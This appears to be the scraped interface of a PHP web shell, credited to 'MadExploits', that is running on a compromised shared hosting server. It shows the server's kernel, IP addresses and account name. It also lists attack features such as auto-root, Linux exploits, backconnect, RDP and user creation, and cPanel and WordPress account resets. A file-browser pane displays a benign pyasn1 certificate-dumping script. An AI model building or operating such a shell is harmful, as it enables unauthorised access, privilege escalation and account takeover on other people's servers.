Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.217.34
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
pyasn1-modules /
tools /
[ HOME SHELL ]
Name
Size
Permission
Action
cmcdump.py
1.73
KB
-rw-r--r--
cmpdump.py
926
B
-rw-r--r--
crldump.py
1.05
KB
-rw-r--r--
crmfdump.py
795
B
-rw-r--r--
ocspclient.py
5.26
KB
-rw-r--r--
ocspreqdump.py
807
B
-rw-r--r--
ocsprspdump.py
804
B
-rw-r--r--
pkcs10dump.py
1.13
KB
-rw-r--r--
pkcs1dump.py
1.36
KB
-rw-r--r--
pkcs7dump.py
1.47
KB
-rw-r--r--
pkcs8dump.py
1.28
KB
-rw-r--r--
snmpget.py
1.41
KB
-rw-r--r--
x509dump-rfc5280.py
1.19
KB
-rw-r--r--
x509dump.py
1.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : x509dump-rfc5280.py
#!/usr/bin/env python # coding: utf-8 # # This file is part of pyasn1-modules software. # # Created by Stanisław Pitucha with asn1ate tool. # Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com> # License: http://pyasn1.sf.net/license.html # # Read ASN.1/PEM X.509 certificates on stdin, parse each into plain text, # then build substrate from it (using RFC5280) # import sys from pyasn1.codec.der import decoder from pyasn1.codec.der import encoder from pyasn1_modules import pem from pyasn1_modules import rfc5280 if len(sys.argv) != 1: print("""Usage: $ cat CACertificate.pem | %s $ cat userCertificate.pem | %s""" % (sys.argv[0], sys.argv[0])) sys.exit(-1) certType = rfc5280.Certificate() certCnt = 0 while 1: idx, substrate = pem.readPemBlocksFromFile( sys.stdin, ('-----BEGIN CERTIFICATE-----', '-----END CERTIFICATE-----') ) if not substrate: break cert, rest = decoder.decode(substrate, asn1Spec=certType) if rest: substrate = substrate[:-len(rest)] print(cert.prettyPrint()) assert encoder.encode(cert) == substrate, 'cert recode fails' certCnt += 1 print('*** %s PEM cert(s) de/serialized' % certCnt)
Close